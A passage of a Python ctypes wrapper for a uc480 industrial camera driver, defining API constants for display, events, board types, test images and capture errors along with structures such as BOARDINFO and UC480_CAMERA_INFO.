IS_GET_FLASH_DELAY = -1
IS_GET_FLASH_DURATION = -2
IS_GET_MAX_FLASH_DELAY = -3
IS_GET_MAX_FLASH_DURATION = -4
IS_GET_MIN_FLASH_DELAY = -5
IS_GET_MIN_FLASH_DURATION = -6
IS_GET_FLASH_DELAY_GRANULARITY = -7
IS_GET_FLASH_DURATION_GRANULARITY = -8
# ----------------------------------------------------------------------------
# Digital IO constants
# ----------------------------------------------------------------------------
IS_GET_IO = 0x8000
IS_GET_IO_MASK = 0x8000
IS_GET_INPUT_MASK = 0x8001
IS_GET_OUTPUT_MASK = 0x8002
IS_GET_SUPPORTED_IO_PORTS = 0x8004
# ----------------------------------------------------------------------------
# EEPROM defines
# ----------------------------------------------------------------------------
IS_EEPROM_MIN_USER_ADDRESS = 0
IS_EEPROM_MAX_USER_ADDRESS = 63
IS_EEPROM_MAX_USER_SPACE = 64
# ----------------------------------------------------------------------------
# error report modes
# ----------------------------------------------------------------------------
IS_GET_ERR_REP_MODE = 0x8000
IS_ENABLE_ERR_REP = 1
IS_DISABLE_ERR_REP = 0
# ----------------------------------------------------------------------------
# display mode selectors
# ----------------------------------------------------------------------------
IS_GET_DISPLAY_MODE = 0x8000
IS_GET_DISPLAY_SIZE_X = 0x8000
IS_GET_DISPLAY_SIZE_Y = 0x8001
IS_GET_DISPLAY_POS_X = 0x8000
IS_GET_DISPLAY_POS_Y = 0x8001
IS_SET_DM_DIB = 1
IS_SET_DM_DIRECTDRAW = 2
IS_SET_DM_DIRECT3D = 4
IS_SET_DM_OPENGL = 8
IS_SET_DM_ALLOW_SYSMEM = 0x40
IS_SET_DM_ALLOW_PRIMARY = 0x80
# -- overlay display mode ---
IS_GET_DD_OVERLAY_SCALE = 0x8000
IS_SET_DM_ALLOW_OVERLAY = 0x100
IS_SET_DM_ALLOW_SCALING = 0x200
IS_SET_DM_ALLOW_FIELDSKIP = 0x400
IS_SET_DM_MONO = 0x800
IS_SET_DM_BAYER = 0x1000
IS_SET_DM_YCBCR = 0x4000
# -- backbuffer display mode ---
IS_SET_DM_BACKBUFFER = 0x2000
# ----------------------------------------------------------------------------
# DirectRenderer commands
# ----------------------------------------------------------------------------
DR_GET_OVERLAY_DC = 1
DR_GET_MAX_OVERLAY_SIZE = 2
DR_GET_OVERLAY_KEY_COLOR = 3
DR_RELEASE_OVERLAY_DC = 4
DR_SHOW_OVERLAY = 5
DR_HIDE_OVERLAY = 6
DR_SET_OVERLAY_SIZE = 7
DR_SET_OVERLAY_POSITION = 8
DR_SET_OVERLAY_KEY_COLOR = 9
DR_SET_HWND = 10
DR_ENABLE_SCALING = 11
DR_DISABLE_SCALING = 12
DR_CLEAR_OVERLAY = 13
DR_ENABLE_SEMI_TRANSPARENT_OVERLAY = 14
DR_DISABLE_SEMI_TRANSPARENT_OVERLAY= 15
DR_CHECK_COMPATIBILITY = 16
DR_SET_VSYNC_OFF = 17
DR_SET_VSYNC_AUTO = 18
DR_SET_USER_SYNC = 19
DR_GET_USER_SYNC_POSITION_RANGE = 20
DR_LOAD_OVERLAY_FROM_FILE = 21
DR_STEAL_NEXT_FRAME = 22
DR_SET_STEAL_FORMAT = 23
DR_GET_STEAL_FORMAT = 24
DR_ENABLE_IMAGE_SCALING = 25
DR_GET_OVERLAY_SIZE = 26
DR_CHECK_COLOR_MODE_SUPPORT = 27
DR_GET_OVERLAY_DATA = 28
DR_UPDATE_OVERLAY_DATA = 29
DR_GET_SUPPORTED = 30
# ----------------------------------------------------------------------------
# DirectDraw keying color constants
# ----------------------------------------------------------------------------
IS_GET_KC_RED = 0x8000
IS_GET_KC_GREEN = 0x8001
IS_GET_KC_BLUE = 0x8002
IS_GET_KC_RGB = 0x8003
IS_GET_KC_INDEX = 0x8004
IS_GET_KEYOFFSET_X = 0x8000
IS_GET_KEYOFFSET_Y = 0x8001
# RGB-triple for default key-color in 15,16,24,32 bit mode
IS_SET_KC_DEFAULT = 0xFF00FF # 0xbbggrr
# color index for default key-color in 8bit palette mode
IS_SET_KC_DEFAULT_8 = 253
# ----------------------------------------------------------------------------
# Memoryboard
# ----------------------------------------------------------------------------
IS_MEMORY_GET_COUNT = 0x8000
IS_MEMORY_GET_DELAY = 0x8001
IS_MEMORY_MODE_DISABLE = 0x0000
IS_MEMORY_USE_TRIGGER = 0xFFFF
# ----------------------------------------------------------------------------
# Test image modes
# ----------------------------------------------------------------------------
IS_GET_TEST_IMAGE = 0x8000
IS_SET_TEST_IMAGE_DISABLED = 0x0000
IS_SET_TEST_IMAGE_MEMORY_1 = 0x0001
IS_SET_TEST_IMAGE_MEMORY_2 = 0x0002
IS_SET_TEST_IMAGE_MEMORY_3 = 0x0003
# ----------------------------------------------------------------------------
# Led settings
# ----------------------------------------------------------------------------
IS_SET_LED_OFF = 0
IS_SET_LED_ON = 1
IS_SET_LED_TOGGLE = 2
IS_GET_LED = 0x8000
# ----------------------------------------------------------------------------
# save options
# ----------------------------------------------------------------------------
IS_SAVE_USE_ACTUAL_IMAGE_SIZE = 0x00010000
# ----------------------------------------------------------------------------
# renumeration modes
# ----------------------------------------------------------------------------
IS_RENUM_BY_CAMERA = 0
IS_RENUM_BY_HOST = 1
# ----------------------------------------------------------------------------
# event constants
# ----------------------------------------------------------------------------
IS_SET_EVENT_ODD = 0
IS_SET_EVENT_EVEN = 1
IS_SET_EVENT_FRAME = 2
IS_SET_EVENT_EXTTRIG = 3
IS_SET_EVENT_VSYNC = 4
IS_SET_EVENT_SEQ = 5
IS_SET_EVENT_STEAL = 6
IS_SET_EVENT_VPRES = 7
IS_SET_EVENT_TRANSFER_FAILED = 8
IS_SET_EVENT_CAPTURE_STATUS = 8
IS_SET_EVENT_DEVICE_RECONNECTED= 9
IS_SET_EVENT_MEMORY_MODE_FINISH= 10
IS_SET_EVENT_FRAME_RECEIVED = 11
IS_SET_EVENT_WB_FINISHED = 12
IS_SET_EVENT_AUTOBRIGHTNESS_FINISHED= 13
IS_SET_EVENT_OVERLAY_DATA_LOST = 16
IS_SET_EVENT_CAMERA_MEMORY = 17
IS_SET_EVENT_CONNECTIONSPEED_CHANGED = 18
IS_SET_EVENT_REMOVE = 128
IS_SET_EVENT_REMOVAL = 129
IS_SET_EVENT_NEW_DEVICE = 130
IS_SET_EVENT_STATUS_CHANGED = 131
# ----------------------------------------------------------------------------
# Window message defines
# ----------------------------------------------------------------------------
WM_USER = 0x400
IS_UC480_MESSAGE = (WM_USER + 0x0100)
IS_FRAME = 0x0000
IS_SEQUENCE = 0x0001
IS_TRIGGER = 0x0002
IS_TRANSFER_FAILED = 0x0003
IS_CAPTURE_STATUS = 0x0003
IS_DEVICE_RECONNECTED = 0x0004
IS_MEMORY_MODE_FINISH = 0x0005
IS_FRAME_RECEIVED = 0x0006
IS_GENERIC_ERROR = 0x0007
IS_STEAL_VIDEO = 0x0008
IS_WB_FINISHED = 0x0009
IS_AUTOBRIGHTNESS_FINISHED = 0x000A
IS_OVERLAY_DATA_LOST = 0x000B
IS_CAMERA_MEMORY = 0x000C
IS_CONNECTIONSPEED_CHANGED = 0x000D
IS_DEVICE_REMOVED = 0x1000
IS_DEVICE_REMOVAL = 0x1001
IS_NEW_DEVICE = 0x1002
IS_DEVICE_STATUS_CHANGED = 0x1003
# ----------------------------------------------------------------------------
# camera id constants
# ----------------------------------------------------------------------------
IS_GET_CAMERA_ID = 0x8000
# ----------------------------------------------------------------------------
# camera info constants
# ----------------------------------------------------------------------------
IS_GET_STATUS = 0x8000
IS_EXT_TRIGGER_EVENT_CNT = 0
IS_FIFO_OVR_CNT = 1
IS_SEQUENCE_CNT = 2
IS_LAST_FRAME_FIFO_OVR = 3
IS_SEQUENCE_SIZE = 4
IS_VIDEO_PRESENT = 5
IS_STEAL_FINISHED = 6
IS_STORE_FILE_PATH = 7
IS_LUMA_BANDWIDTH_FILTER = 8
IS_BOARD_REVISION = 9
IS_MIRROR_BITMAP_UPDOWN = 10
IS_BUS_OVR_CNT = 11
IS_STEAL_ERROR_CNT = 12
IS_LOW_COLOR_REMOVAL = 13
IS_CHROMA_COMB_FILTER = 14
IS_CHROMA_AGC = 15
IS_WATCHDOG_ON_BOARD = 16
IS_PASSTHROUGH_ON_BOARD = 17
IS_EXTERNAL_VREF_MODE = 18
IS_WAIT_TIMEOUT = 19
IS_TRIGGER_MISSED = 20
IS_LAST_CAPTURE_ERROR = 21
IS_PARAMETER_SET_1 = 22
IS_PARAMETER_SET_2 = 23
IS_STANDBY = 24
IS_STANDBY_SUPPORTED = 25
IS_QUEUED_IMAGE_EVENT_CNT = 26
IS_PARAMETER_EXT = 27
# ----------------------------------------------------------------------------
# interface type defines
# ----------------------------------------------------------------------------
IS_INTERFACE_TYPE_USB = 0x40
IS_INTERFACE_TYPE_USB3 = 0x60
IS_INTERFACE_TYPE_ETH = 0x80
# ----------------------------------------------------------------------------
# board type defines
# ----------------------------------------------------------------------------
IS_BOARD_TYPE_FALCON = 1
IS_BOARD_TYPE_EAGLE = 2
IS_BOARD_TYPE_FALCON2 = 3
IS_BOARD_TYPE_FALCON_PLUS = 7
IS_BOARD_TYPE_FALCON_QUATTRO = 9
IS_BOARD_TYPE_FALCON_DUO = 10
IS_BOARD_TYPE_EAGLE_QUATTRO = 11
IS_BOARD_TYPE_EAGLE_DUO = 12
IS_BOARD_TYPE_UC480_USB = (IS_INTERFACE_TYPE_USB + 0) # 0x40
IS_BOARD_TYPE_UC480_USB_SE = IS_BOARD_TYPE_UC480_USB # 0x40
IS_BOARD_TYPE_UC480_USB_RE = IS_BOARD_TYPE_UC480_USB # 0x40
IS_BOARD_TYPE_UC480_USB_ME = (IS_INTERFACE_TYPE_USB + 0x01) # 0x41
IS_BOARD_TYPE_UC480_USB_LE = (IS_INTERFACE_TYPE_USB + 0x02) # 0x42
IS_BOARD_TYPE_UC480_USB_XS = (IS_INTERFACE_TYPE_USB + 0x03) # 0x43
IS_BOARD_TYPE_UC480_USB_ML = (IS_INTERFACE_TYPE_USB + 0x05) # 0x45
IS_BOARD_TYPE_UC480_USB3_CP = (IS_INTERFACE_TYPE_USB3 + 0x04) # 0x64
IS_BOARD_TYPE_UC480_ETH = IS_INTERFACE_TYPE_ETH # 0x80
IS_BOARD_TYPE_UC480_ETH_HE = IS_BOARD_TYPE_UC480_ETH # 0x80
IS_BOARD_TYPE_UC480_ETH_SE = (IS_INTERFACE_TYPE_ETH + 0x01) # 0x81
IS_BOARD_TYPE_UC480_ETH_RE = IS_BOARD_TYPE_UC480_ETH_SE # 0x81
IS_BOARD_TYPE_UC480_ETH_CP = IS_BOARD_TYPE_UC480_ETH + 0x04 # 0x84
# ----------------------------------------------------------------------------
# camera type defines
# ----------------------------------------------------------------------------
IS_CAMERA_TYPE_UC480_USB = IS_BOARD_TYPE_UC480_USB_SE
IS_CAMERA_TYPE_UC480_USB_SE = IS_BOARD_TYPE_UC480_USB_SE
IS_CAMERA_TYPE_UC480_USB_RE = IS_BOARD_TYPE_UC480_USB_RE
IS_CAMERA_TYPE_UC480_USB_ME = IS_BOARD_TYPE_UC480_USB_ME
IS_CAMERA_TYPE_UC480_USB_LE = IS_BOARD_TYPE_UC480_USB_LE
IS_CAMERA_TYPE_UC480_USB_ML = IS_BOARD_TYPE_UC480_USB_ML
IS_CAMERA_TYPE_UC480_USB3_CP = IS_BOARD_TYPE_UC480_USB3_CP
IS_CAMERA_TYPE_UC480_ETH = IS_BOARD_TYPE_UC480_ETH_HE
IS_CAMERA_TYPE_UC480_ETH_HE = IS_BOARD_TYPE_UC480_ETH_HE
IS_CAMERA_TYPE_UC480_ETH_SE = IS_BOARD_TYPE_UC480_ETH_SE
IS_CAMERA_TYPE_UC480_ETH_RE = IS_BOARD_TYPE_UC480_ETH_RE
IS_CAMERA_TYPE_UC480_ETH_CP = IS_BOARD_TYPE_UC480_ETH_CP
# ----------------------------------------------------------------------------
# readable operation system defines
# ----------------------------------------------------------------------------
IS_OS_UNDETERMINED = 0
IS_OS_WIN95 = 1
IS_OS_WINNT40 = 2
IS_OS_WIN98 = 3
IS_OS_WIN2000 = 4
IS_OS_WINXP = 5
IS_OS_WINME = 6
IS_OS_WINNET = 7
IS_OS_WINSERVER2003 = 8
IS_OS_WINVISTA = 9
IS_OS_LINUX24 = 10
IS_OS_LINUX26 = 11
IS_OS_WIN7 = 12
IS_OS_WIN8 = 13
# ----------------------------------------------------------------------------
# Bus speed
# ----------------------------------------------------------------------------
IS_USB_10 = 0x0001 # 1,5 Mb/s
IS_USB_11 = 0x0002 # 12 Mb/s
IS_USB_20 = 0x0004 # 480 Mb/s
IS_USB_30 = 0x0008 # 4000 Mb/s
IS_ETHERNET_10 = 0x0080 # 10 Mb/s
IS_ETHERNET_100 = 0x0100 # 100 Mb/s
IS_ETHERNET_1000 = 0x0200 # 1000 Mb/s
IS_ETHERNET_10000 = 0x0400 # 10000 Mb/s
IS_USB_LOW_SPEED = 1
IS_USB_FULL_SPEED = 12
IS_USB_HIGH_SPEED = 480
IS_USB_SUPER_SPEED = 4000
IS_ETHERNET_10Base = 10
IS_ETHERNET_100Base = 100
IS_ETHERNET_1000Base = 1000
IS_ETHERNET_10GBase = 10000
# ----------------------------------------------------------------------------
# HDR
# ----------------------------------------------------------------------------
IS_HDR_NOT_SUPPORTED = 0
IS_HDR_KNEEPOINTS = 1
IS_DISABLE_HDR = 0
IS_ENABLE_HDR = 1
# ----------------------------------------------------------------------------
# Test images
# ----------------------------------------------------------------------------
IS_TEST_IMAGE_NONE = 0x00000000
IS_TEST_IMAGE_WHITE = 0x00000001
IS_TEST_IMAGE_BLACK = 0x00000002
IS_TEST_IMAGE_HORIZONTAL_GREYSCALE = 0x00000004
IS_TEST_IMAGE_VERTICAL_GREYSCALE = 0x00000008
IS_TEST_IMAGE_DIAGONAL_GREYSCALE = 0x00000010
IS_TEST_IMAGE_WEDGE_GRAY = 0x00000020
IS_TEST_IMAGE_WEDGE_COLOR = 0x00000040
IS_TEST_IMAGE_ANIMATED_WEDGE_GRAY = 0x00000080
IS_TEST_IMAGE_ANIMATED_WEDGE_COLOR = 0x00000100
IS_TEST_IMAGE_MONO_BARS = 0x00000200
IS_TEST_IMAGE_COLOR_BARS1 = 0x00000400
IS_TEST_IMAGE_COLOR_BARS2 = 0x00000800
IS_TEST_IMAGE_GREYSCALE1 = 0x00001000
IS_TEST_IMAGE_GREY_AND_COLOR_BARS = 0x00002000
IS_TEST_IMAGE_MOVING_GREY_AND_COLOR_BARS = 0x00004000
IS_TEST_IMAGE_ANIMATED_LINE = 0x00008000
IS_TEST_IMAGE_ALTERNATE_PATTERN = 0x00010000
IS_TEST_IMAGE_VARIABLE_GREY = 0x00020000
IS_TEST_IMAGE_MONOCHROME_HORIZONTAL_BARS = 0x00040000
IS_TEST_IMAGE_MONOCHROME_VERTICAL_BARS = 0x00080000
IS_TEST_IMAGE_CURSOR_H = 0x00100000
IS_TEST_IMAGE_CURSOR_V = 0x00200000
IS_TEST_IMAGE_COLDPIXEL_GRID = 0x00400000
IS_TEST_IMAGE_HOTPIXEL_GRID = 0x00800000
IS_TEST_IMAGE_VARIABLE_RED_PART = 0x01000000
IS_TEST_IMAGE_VARIABLE_GREEN_PART = 0x02000000
IS_TEST_IMAGE_VARIABLE_BLUE_PART = 0x04000000
IS_TEST_IMAGE_SHADING_IMAGE = 0x08000000
IS_TEST_IMAGE_WEDGE_GRAY_SENSOR = 0x10000000
# 0x20000000
# 0x40000000
# 0x80000000
# ----------------------------------------------------------------------------
# Sensor scaler
# ----------------------------------------------------------------------------
IS_ENABLE_SENSOR_SCALER = 1
IS_ENABLE_ANTI_ALIASING = 2
# ----------------------------------------------------------------------------
# Timeouts
# ----------------------------------------------------------------------------
IS_TRIGGER_TIMEOUT = 0
# ----------------------------------------------------------------------------
# Auto pixel clock modes
# ----------------------------------------------------------------------------
IS_BEST_PCLK_RUN_ONCE = 0
# ----------------------------------------------------------------------------
# sequence flags
# ----------------------------------------------------------------------------
IS_LOCK_LAST_BUFFER = 0x8002
IS_GET_ALLOC_ID_OF_THIS_BUF = 0x8004
IS_GET_ALLOC_ID_OF_LAST_BUF = 0x8008
IS_USE_ALLOC_ID = 0x8000
IS_USE_CURRENT_IMG_SIZE = 0xC000
# ------------------------------------------
# Memory information flags
# ------------------------------------------
IS_GET_D3D_MEM = 0x8000
# ----------------------------------------------------------------------------
# Image files types
# ----------------------------------------------------------------------------
IS_IMG_BMP = 0
IS_IMG_JPG = 1
IS_IMG_PNG = 2
IS_IMG_RAW = 4
IS_IMG_TIF = 8
# ----------------------------------------------------------------------------
# I2C defines
# nRegisterAddr | IS_I2C_16_BIT_REGISTER
# ----------------------------------------------------------------------------
IS_I2C_16_BIT_REGISTER = 0x10000000
IS_I2C_0_BIT_REGISTER = 0x20000000
# nDeviceAddr | IS_I2C_DONT_WAIT
IS_I2C_DONT_WAIT = 0x00800000
# ----------------------------------------------------------------------------
# DirectDraw steal video constants (Falcon)
# ----------------------------------------------------------------------------
IS_INIT_STEAL_VIDEO = 1
IS_EXIT_STEAL_VIDEO = 2
IS_INIT_STEAL_VIDEO_MANUAL = 3
IS_INIT_STEAL_VIDEO_AUTO = 4
IS_SET_STEAL_RATIO = 64
IS_USE_MEM_IMAGE_SIZE = 128
IS_STEAL_MODES_MASK = 7
IS_SET_STEAL_COPY = 0x1000
IS_SET_STEAL_NORMAL = 0x2000
# ----------------------------------------------------------------------------
# AGC modes (Falcon)
# ----------------------------------------------------------------------------
IS_GET_AGC_MODE = 0x8000
IS_SET_AGC_OFF = 0
IS_SET_AGC_ON = 1
# ----------------------------------------------------------------------------
# Gamma modes (Falcon)
# ----------------------------------------------------------------------------
IS_GET_GAMMA_MODE = 0x8000
IS_SET_GAMMA_OFF = 0
IS_SET_GAMMA_ON = 1
# ----------------------------------------------------------------------------
# sync levels (Falcon)
# ----------------------------------------------------------------------------
IS_GET_SYNC_LEVEL = 0x8000
IS_SET_SYNC_75 = 0
IS_SET_SYNC_125 = 1
# ----------------------------------------------------------------------------
# color bar modes (Falcon)
# ----------------------------------------------------------------------------
IS_GET_CBARS_MODE = 0x8000
IS_SET_CBARS_OFF = 0
IS_SET_CBARS_ON = 1
# ----------------------------------------------------------------------------
# horizontal filter defines (Falcon)
# ----------------------------------------------------------------------------
IS_GET_HOR_FILTER_MODE = 0x8000
IS_GET_HOR_FILTER_STEP = 0x8001
IS_DISABLE_HOR_FILTER = 0
IS_ENABLE_HOR_FILTER = 1
def IS_HOR_FILTER_STEP(_s_):
return ((_s_ + 1) << 1)
IS_HOR_FILTER_STEP1 = 2
IS_HOR_FILTER_STEP2 = 4
IS_HOR_FILTER_STEP3 = 6
# ----------------------------------------------------------------------------
# vertical filter defines (Falcon)
# ----------------------------------------------------------------------------
IS_GET_VERT_FILTER_MODE = 0x8000
IS_GET_VERT_FILTER_STEP = 0x8001
IS_DISABLE_VERT_FILTER = 0
IS_ENABLE_VERT_FILTER = 1
def IS_VERT_FILTER_STEP(_s_):
return ((_s_ + 1) << 1)
IS_VERT_FILTER_STEP1 = 2
IS_VERT_FILTER_STEP2 = 4
IS_VERT_FILTER_STEP3 = 6
# ----------------------------------------------------------------------------
# scaler modes (Falcon)
# ----------------------------------------------------------------------------
IS_GET_SCALER_MODE = float( 1000)
IS_SET_SCALER_OFF = float( 0)
IS_SET_SCALER_ON = float( 1)
IS_MIN_SCALE_X = float( 6.25)
IS_MAX_SCALE_X = float( 100.00)
IS_MIN_SCALE_Y = float( 6.25)
IS_MAX_SCALE_Y = float( 100.00)
# ----------------------------------------------------------------------------
# video source selectors (Falcon)
# ----------------------------------------------------------------------------
IS_GET_VIDEO_IN = 0x8000
IS_GET_VIDEO_PASSTHROUGH = 0x8000
IS_GET_VIDEO_IN_TOGGLE = 0x8001
IS_GET_TOGGLE_INPUT_1 = 0x8000
IS_GET_TOGGLE_INPUT_2 = 0x8001
IS_GET_TOGGLE_INPUT_3 = 0x8002
IS_GET_TOGGLE_INPUT_4 = 0x8003
IS_SET_VIDEO_IN_1 = 0x00
IS_SET_VIDEO_IN_2 = 0x01
IS_SET_VIDEO_IN_S = 0x02
IS_SET_VIDEO_IN_3 = 0x03
IS_SET_VIDEO_IN_4 = 0x04
IS_SET_VIDEO_IN_1S = 0x10
IS_SET_VIDEO_IN_2S = 0x11
IS_SET_VIDEO_IN_3S = 0x13
IS_SET_VIDEO_IN_4S = 0x14
IS_SET_VIDEO_IN_EXT = 0x40
IS_SET_TOGGLE_OFF = 0xFF
IS_SET_VIDEO_IN_SYNC = 0x4000
# ----------------------------------------------------------------------------
# video crossbar selectors (Falcon)
# ----------------------------------------------------------------------------
IS_GET_CROSSBAR = 0x8000
IS_CROSSBAR_1 = 0
IS_CROSSBAR_2 = 1
IS_CROSSBAR_3 = 2
IS_CROSSBAR_4 = 3
IS_CROSSBAR_5 = 4
IS_CROSSBAR_6 = 5
IS_CROSSBAR_7 = 6
IS_CROSSBAR_8 = 7
IS_CROSSBAR_9 = 8
IS_CROSSBAR_10 = 9
IS_CROSSBAR_11 = 10
IS_CROSSBAR_12 = 11
IS_CROSSBAR_13 = 12
IS_CROSSBAR_14 = 13
IS_CROSSBAR_15 = 14
IS_CROSSBAR_16 = 15
IS_SELECT_AS_INPUT = 128
# ----------------------------------------------------------------------------
# video format selectors (Falcon)
# ----------------------------------------------------------------------------
IS_GET_VIDEO_MODE = 0x8000
IS_SET_VM_PAL = 0
IS_SET_VM_NTSC = 1
IS_SET_VM_SECAM = 2
IS_SET_VM_AUTO = 3
# ----------------------------------------------------------------------------
# capture modes (Falcon)
# ----------------------------------------------------------------------------
IS_GET_CAPTURE_MODE = 0x8000
IS_SET_CM_ODD = 0x0001
IS_SET_CM_EVEN = 0x0002
IS_SET_CM_FRAME = 0x0004
IS_SET_CM_NONINTERLACED = 0x0008
IS_SET_CM_NEXT_FRAME = 0x0010
IS_SET_CM_NEXT_FIELD = 0x0020
IS_SET_CM_BOTHFIELDS = (IS_SET_CM_ODD | IS_SET_CM_EVEN | IS_SET_CM_NONINTERLACED)
IS_SET_CM_FRAME_STEREO = 0x2004
# ----------------------------------------------------------------------------
# display update mode constants (Falcon)
# ----------------------------------------------------------------------------
IS_GET_UPDATE_MODE = 0x8000
IS_SET_UPDATE_TIMER = 1
IS_SET_UPDATE_EVENT = 2
# ----------------------------------------------------------------------------
# sync generator mode constants (Falcon)
# ----------------------------------------------------------------------------
IS_GET_SYNC_GEN = 0x8000
IS_SET_SYNC_GEN_OFF = 0
IS_SET_SYNC_GEN_ON = 1
# ----------------------------------------------------------------------------
# decimation modes (Falcon)
# ----------------------------------------------------------------------------
IS_GET_DECIMATION_MODE = 0x8000
IS_GET_DECIMATION_NUMBER = 0x8001
IS_DECIMATION_OFF = 0
IS_DECIMATION_CONSECUTIVE = 1
IS_DECIMATION_DISTRIBUTED = 2
# ----------------------------------------------------------------------------
# hardware watchdog defines (Falcon)
# ----------------------------------------------------------------------------
IS_GET_WATCHDOG_TIME = 0x2000
IS_GET_WATCHDOG_RESOLUTION = 0x4000
IS_GET_WATCHDOG_ENABLE = 0x8000
IS_WATCHDOG_MINUTES = 0
IS_WATCHDOG_SECONDS = 0x8000
IS_DISABLE_WATCHDOG = 0
IS_ENABLE_WATCHDOG = 1
IS_RETRIGGER_WATCHDOG = 2
IS_ENABLE_AUTO_DEACTIVATION = 4
IS_DISABLE_AUTO_DEACTIVATION = 8
IS_WATCHDOG_RESERVED = 0x1000
# ----------------------------------------------------------------------------
# typedefs
# ----------------------------------------------------------------------------
HCAM = wt.DWORD
# ----------------------------------------------------------------------------
# invalid values for device handles
# ----------------------------------------------------------------------------
IS_INVALID_HCAM = 0
class BOARDINFO(ctypes.Structure):
"""
:var ctypes.c_char[12] SerNo: Serial number of sensor chip.
:var ctypes.c_char[20] ID: Camera ID.
:var ctypes.c_char[10] Version:
:var ctypes.c_char[12] Date:
:var ctypes.c_ubyte Select:
:var ctypes.c_ubyte Type:
:var ctypes.c_char[8] Reserved:
"""
_fields_ = [("SerNo", ctypes.c_char * 12),
("ID", ctypes.c_char * 20),
("Version", ctypes.c_char * 10),
("Date", ctypes.c_char * 12),
("Select", ctypes.c_ubyte),
("Type", ctypes.c_ubyte),
("Reserved", ctypes.c_char * 8)]
# ----------------------------------------------------------------------------
# info struct
# ----------------------------------------------------------------------------
FALCINFO = BOARDINFO
PFALCINFO = ctypes.POINTER(BOARDINFO)
CAMINFO = BOARDINFO
PCAMINFO = ctypes.POINTER(BOARDINFO)
class SENSORINFO(ctypes.Structure):
"""
:var WORD SensorID:
:var ctypes.c_char[32] strSensorName:
:var BYTE nColorMode:
:var DWORD nMaxWidth:
:var DWORD nMaxHeight:
:var BOOL bMasterGain:
:var BOOL bRGain:
:var BOOL bGGain:
:var BOOL bBGain:
:var WORD wPixelSize:
:var ctypes.c_char[14] Reserved:
"""
_fields_ = [("SensorID", wt.WORD),
("strSensorName", ctypes.c_char * 32),
("nColorMode", wt.BYTE),
("nMaxWidth", wt.DWORD),
("nMaxHeight", wt.DWORD),
("bMasterGain", wt.BOOL),
("bRGain", wt.BOOL),
("bGGain", wt.BOOL),
("bBGain", wt.BOOL),
("wPixelSize", wt.WORD),
("Reserved", ctypes.c_char * 14)]
class REVISIONINFO(ctypes.Structure):
"""
:var WORD size:
:var WORD Sensor:
:var WORD Cypress:
:var WORD Blackfin:
:var WORD DspFirmware:
:var WORD USB_Board:
:var WORD Sensor_Board:
:var WORD Processing_Board:
:var WORD Memory_Board:
:var WORD Housing:
:var WORD Filter:
:var WORD Timing_Board:
:var WORD Product:
:var WORD Power_Board:
:var WORD Power_Board:
:var WORD Logic_Board:
:var WORD FX3:
:var WORD FPGA:
:var ctypes.c_char[92] Reserved:
"""
_fields_ = [("size", wt.WORD),
("Sensor", wt.WORD),
("Cypress", wt.WORD),
("Blackfin", wt.DWORD),
("DspFirmware", wt.WORD),
("USB_Board", wt.WORD),
("Sensor_Board", wt.WORD),
("Processing_Board", wt.WORD),
("Memory_Board", wt.WORD),
("Housing", wt.WORD),
("Filter", wt.WORD),
("Timing_Board", wt.WORD),
("Product", wt.WORD),
("Power_Board", wt.WORD),
("Logic_Board", wt.WORD),
("FX3", wt.WORD),
("FPGA", wt.WORD),
("Reserved", ctypes.c_char * 92)]
# ----------------------------------------------------------------------------
# Capture errors
# ----------------------------------------------------------------------------
IS_CAPERR_API_NO_DEST_MEM= 0xa2
IS_CAPERR_API_CONVERSION_FAILED= 0xa3
IS_CAPERR_API_IMAGE_LOCKED= 0xa5
IS_CAPERR_DRV_OUT_OF_BUFFERS= 0xb2
IS_CAPERR_DRV_DEVICE_NOT_READY= 0xb4
IS_CAPERR_USB_TRANSFER_FAILED= 0xc7
IS_CAPERR_DEV_TIMEOUT= 0xd6
IS_CAPERR_ETH_BUFFER_OVERRUN= 0xe4
IS_CAPERR_ETH_MISSED_IMAGES= 0xe5
class UC480_CAPTURE_ERROR_INFO(ctypes.Structure):
"""
:var DWORD dwCapErrCnt_Total:
:var BYTE[60] reserved:
:var DWORD[256] adwCapErrCnt_Detail:
"""
_fields_ = [("dwCapErrCnt_Total", wt.DWORD),
("reserved", wt.BYTE * 60),
("adwCapErrCnt_Detail", wt.DWORD * 256)] #: Attributes
IS_CAP_STATUS_API_NO_DEST_MEM = 0xa2
IS_CAP_STATUS_API_CONVERSION_FAILED = 0xa3
IS_CAP_STATUS_API_IMAGE_LOCKED = 0xa5
IS_CAP_STATUS_DRV_OUT_OF_BUFFERS = 0xb2
IS_CAP_STATUS_DRV_DEVICE_NOT_READY = 0xb4
IS_CAP_STATUS_USB_TRANSFER_FAILED = 0xc7
IS_CAP_STATUS_DEV_TIMEOUT = 0xd6
IS_CAP_STATUS_ETH_BUFFER_OVERRUN = 0xe4
IS_CAP_STATUS_ETH_MISSED_IMAGES = 0xe5
class UC480_CAPTURE_STATUS_INFO(ctypes.Structure):
"""
:var DWORD dwCapStatusCnt_Total:
:var BYTE[60] reserved:
:var DWORD[256] adwCapStatusCnt_Detail:
"""
_fields_ = [("dwCapStatusCnt_Total", wt.DWORD),
("reserved", wt.BYTE * 60),
("adwCapStatusCnt_Detail", wt.DWORD * 256)]
IS_CAPTURE_STATUS_INFO_CMD_RESET = 1
IS_CAPTURE_STATUS_INFO_CMD_GET = 2
class UC480_CAMERA_INFO(ctypes.Structure):
"""
:var DWORD dwCameraID:
:var DWORD dwDeviceID:
:var DWORD dwSensorID:
:var DWORD dwInUse:
:var ctypes.c_char[16] SerNo:
:var ctypes.c_char[16] Model:
:var DWORD dwStatus:
:var DWORD[15] dwReserved:
"""
_fields_ = [("dwCameraID", wt.DWORD),
("dwDeviceID", wt.DWORD),
("dwSensorID", wt.DWORD),
("dwInUse", wt.DWORD),
("SerNo", ctypes.c_char * 16),
("Model", ctypes.c_char * 16),
("dwStatus", wt.DWORD),
("dwReserved", wt.DWORD * 15)]
# usage of the list:
# 1. call the DLL with .dwCount = 0
# 2. DLL returns .dwCount = N (N = number of available cameras)
# 3. call DLL with .dwCount = N and a pointer to UC480_CAMERA_LIST with
# and array of UC480_CAMERA_INFO[N]
# 4. DLL will fill in the array with the camera infos and
# will update the .dwCount member with the actual number of cameras
# because there may be a change in number of cameras between step 2 and 3
# 5. check if there's a difference in actual .dwCount and formerly
# reported value of N and call DLL again with an updated array size
# class UC480_CAMERA_LIST(ctypes.Structure):
# _fields_ = [("dwCount", wt.ULONG),
# ("uci", ctypes.POINTER(UC480_CAMERA_INFO))]
def create_camera_list(dwCount):
"""Returns an instance of the UC480_CAMERA_LIST structure having the properly scaled UC480_CAMERA_INFO array.
:param ULONG dwCount: Number of camera info structures requested.
:returns: UC480_CAMERA_LIST
:var ULONG dwCount: Size of uci.
